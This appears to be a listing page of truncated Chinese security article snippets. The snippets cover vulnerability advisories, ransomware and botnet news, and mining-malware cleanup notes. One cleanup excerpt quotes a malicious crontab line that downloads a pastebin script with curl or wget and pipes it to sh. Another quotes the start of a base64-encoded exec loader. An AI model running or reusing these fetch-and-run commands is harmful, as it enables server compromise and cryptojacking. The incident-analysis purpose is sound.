漏洞描述 GitLab 是由 GitLab 公司开发的、基于 Git 的集成软件开发平台。 GitLab 的受影响版本中存在的开放重定向漏洞，攻击者可利用此漏洞诱导用户点击可信的 url 将用户重定向到恶意网址，进而窃取用户凭据或其它敏感信息。 漏洞名称 GitLab 存在开放重定...

漏洞描述 Grafana 是一个跨平台、开源的数据可视化网络应用平台。 Grafana 的受影响版本中存在敏感信息泄露漏洞，原因是在登录页面使用忘记密码时，平台会向 /api/user/password/sent-reset-email 发送一个 Post 请求，如果用户名或电子邮件不存在时，JSON...

报告编号：B6-2021-122301 报告来源：360CERT 报告作者：360CERT 更新日期：2021-12-23 漏洞简述 2021年12月23日，360CERT监测发现Apache官方发布了安全通告 ，修复了多个漏洞，其中包含的漏洞编号有：CVE-2021-44224、CVE-2021-44790，漏洞等级：高危，漏洞...

0x01 攻击方式 利用的是通用漏洞入侵服务器并获得相关权限，从而植入挖矿程序再进行隐藏。 通过对脚本的分析，发现黑客主要是利用Redis未授权访问漏洞进行入侵。脚本里有个python函数。 import base64;exec(base64.b64decode(I2NvZGluZzogdXRmLTgKaW1wb3J0IH...

以太坊矿工强烈反对变革，威胁发动 51% 攻击 以太坊创始人 Vitalik Buterin 强力推动的新提案 EIP-1559 被认为将让整个以太坊生态系统受益，但代价是大幅减少矿工们的收入，因此遭到了部分矿工们的强烈反对。而大型矿池由于有大量的 ETH 储蓄，因此可以从该...

近日，Python 软件基金会（PSF）释出 Python3.8.8 和 3.9.2 版本，该版本主要修复了两个值得注意的安全漏洞，其中一个名为CVE-2021-3177的漏洞容易被攻击者远程利用，基于代码执行可让计算机脱机。 乍一看，让计算机脱机并不是什么大事，不过，倘若真的被有...

Google 于 2 月 5 日发布了针对 Windows、Mac 和 Linux 用户的 Chrome 小版本更新，更新后 Chrome 的版本号来到了 88.0.4324.150。在这个版本中 Google 解决了一个已被利用的零日安全漏洞（zero-day vulnerability）。 这个被 Google 评定为高度严重的漏洞被...

Redis Centos镜像漏洞修复以及升级内核版本 linux内核介绍：https://www.cnblogs.com/still-smile/p/11597620.html redis当前所有的Centos镜像默认自带的ssh 版本过低，所以会出现以下漏洞。 1 OpenSSH 命令注入漏洞(CVE-2020-15778) 2 OpenSSH 安全漏洞(CVE-...

安全公司 Kaspersky 日前 发现 了一个新的文件加密木马，它是 ELF 可执行文件，旨在对基于 Linux 的操作系统计算机上的数据进行加密。 Kaspersky 经过初步分析，发现遇到的实际是已知勒索软件 RansomEXX 的 Linux 构建版本。 RansomEXX 是年初开始活跃的一种...

Linux 内核现在已经增加了对 exFAT 的支持，同时它也没有放弃维护原有 FAT 文件系统驱动，甚至现在从邮件列表上看，FAT 性能方面可能会有大幅提升。 开发 Tux3 文件系统而闻名的 OGAWA Hirofumi 在邮件列表中提到了目前 Linux FAT 文件系统的预读取处理有瑕疵...

安全公司 Sophos 警告说，新的勒索软件攻击使用了易受攻击的技嘉驱动程序，试图闯入 Windows 系统，然后禁用正在运行的安全软件。该攻击基于 2018 年在技嘉驱动程序中发现的安全漏洞，该安全漏洞在 CVE-2018-19320 中有详细说明。 该驱动程序在技嘉确认该错误...

勒索软件将在 2020 年继续困扰组织，因为网络加密恶意软件攻击背后的网络罪犯几乎没有被抓住的风险。因此，对攻击者而言，风险很小，但潜在的回报却很大。 在过去的一年中，有许多勒索软件攻击的例子，已经有受害者屈服于攻击者的勒索要求，他们通常支付数十...

一. 症状及表现 CPU使用率异常高，外出流量异常 crontab异常，存在如下定时任务(基本上就可以确定了) [root@it.net.cn ~]# crontab -l */15 * * * * （curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 在...

起因 闲来无事准备用服务器搭建个环境玩玩，连上服务器之后发现命令行卡的飞起，使用top看看cpu占用率，这里上前三截图。 sysupdate 系统更新？？ networkservice 网络服务？？？ 上阿里云管理控制台看看CPU占用率，占用率直接100%，再看看CPU以及内存的记录...

挖矿病毒清除记录 出现现象 查看定时任务 开始解决 目前还存在三个问题： 出现现象 cpu是4核的但使用htop无法查看到，之前跑的服务进程都被kill掉了，重新启动服务依然被kill掉。 查看定时任务 crontab -l 会出现如下这些curl请求一个域名里面的数据并且下载...

1短信炸弹 漏洞描述 短信轰炸攻击是常见的一种攻击，攻击者通过网站页面中所提供的发送短信验证码的功能处，通过对其发送数据包的获取后，进行重放，如果服务器短信平台未做校验的情况时，系统会一直去发送短信，这样就造成了短信轰炸的漏洞。 渗透测试 手工...

1 信息收集 1.1 域名、IP、端口 域名信息查询：信息可用于后续渗透 IP信息查询：确认域名对应IP，确认IP是否真实，确认通信是否正常 端口信息查询：NMap扫描，确认开放端口 如果不会用Nmap，看这里：NMAP 基础教程（功能介绍，安装，使用） 发现：一共开放两...

一个网络犯罪组织正在将运行易受攻击的 Webmin 应用程序（Linux 系统的基于 Web 的远程管理应用程序）的 Linux 服务器组建成一个新的僵尸网络，安全研究人员目前正在使用 Roboto 的名称对其进行跟踪。 僵尸网络的出现可追溯到今年夏天，这与披露了一个在超过...

微软宣布将于 2020 年将其企业安全产品 Defender 高级威胁防护（ATP）引入 Linux。 微软的年度开发者大会 Microsoft Ignite 刚刚结束，会上发布了一些与 Linux 有关的重要公告。你可能已经知道微软将 Edge Web 浏览器引入 Linux，而下一个大新闻是微软将 Def...

SmarterASP.NET 是一家拥有超过 44 万客户的知名 ASP.NET 托管提供商。昨日该公司发布公告称，遭到勒索软件的攻击，这也是 2019 年遭到攻击而下线的第三家大型网络托管公司，黑客不仅破坏了该公司的托管业务而且还对客户服务器上的数据进行了加密。 SmarterA...

适合新手及才接触VPS的朋友们看一下，主要是关于VPS安全方面相关内容的 禁止ROOT登陆 保证安全性； 使用DDoS deflate简单防攻击； iftop Linux流量监控工具； 每日自动备份VPS到FTP空间； 升级LNMP的NGINX到最新版。 一、修改SSH端口 vi /etc/ssh/sshd_confi...

Oracle 官方发布安全公告，披露 WebLogic 服务器存在多个高危漏洞，包括反序列化等。黑客利用漏洞可能可以远程获取 WebLogic 服务器权限，风险较大。 漏洞描述 CVE-2019-2891 中，未经授权的攻击者可以通过精心构造的 HTTP 请求向 Console 组件发起请求，从...

经过多年以来的无数次审查、讨论和代码重写，Linus Torvalds 通过了一项 Linux 内核新的安全功能，它被称为锁定（lockdown）。 这项新功能将作为 LSM（Linux Security Module，Linux 安全模块）包含在即将发布的 Linux kernel 5.4 中。由于存在破坏现有系统...

近日，维基百科（Wikipedia）遭受恶意网络攻击导致多个国家的网站宕机下线。本次攻击发生在 2019 年 9 月 8 日凌晨 2 点左右，主要受到影响的是欧洲和中东用户。downdetector.com 网站记录了本次的攻击，当时收到了数千起报告。 维基百科基金会的德国推特账...

研究人员表示在过去 6 个月中网络攻击所造成的破坏力翻倍，而且受影响的组织中有 50％ 属于制造业。基于近阶段的网络攻击，本周一 IBM 的 X-Force IRIS 事件响应团队发布了新的安全研究报告，强调破坏型恶意软件正在快速爆发。通过对恶意代码的分析发现，诸...

安全研究员 Dominik Penner 披露了 Linux KDE 桌面环境上存在的一个 0day 漏洞。根据 Dominik 的说法，此漏洞存在于 KDE v4 与 v5 版本中，该漏洞使得嵌入在 .desktop 和 .directory 文件中的命令在打开文件夹或者将压缩文件夹提取到桌面时即可执行，目前几...

根据外媒ZDNet援引rainbowtabl.es安全博客上的文章报道，上海交通大学一个数据库因未正确配置公开访问权限，从而导致泄漏了 8.4TB 的电子邮件元数据。 这个暴露的服务器是由CloudFlare安全总监 Justin于 2019 年 5 月 22 日发现的。 Justin 表示自己在Shodan...

AppRiver 安全公司发现，从网络钓鱼模板到恶意软件以及命令和控制服务，Azure 云服务依然存在安全问题，研究发现其根源问题存在于微软的 Azure 基础设施中。BleepingComputer 称，在早期报道中，5 月份陆续出现了两起与 Azure 相关的恶意软件攻击事件： 自 5...